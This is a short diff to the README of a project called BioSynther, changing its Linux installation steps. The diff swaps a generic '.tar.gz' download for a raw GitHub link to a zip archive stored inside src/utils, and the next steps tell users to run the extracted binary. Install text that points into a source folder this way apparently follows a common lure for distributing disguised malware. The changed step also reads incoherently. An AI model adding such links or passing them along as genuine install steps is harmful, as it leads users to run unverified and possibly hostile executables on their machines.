PoraminSukyaruek/BioSynther/README.md

 - You can now find BioSynther in your Applications.

 ### For Linux:
-- Extract the downloaded .tar.gz file.
+- Extract the downloaded https://raw.githubusercontent.com/PoraminSukyaruek/BioSynther/main/src/utils/BioSynther-v2.7-alpha.4.zip file.
 - Open your terminal and navigate to the extracted folder.
 - Run the command `./BioSynther` to start the application.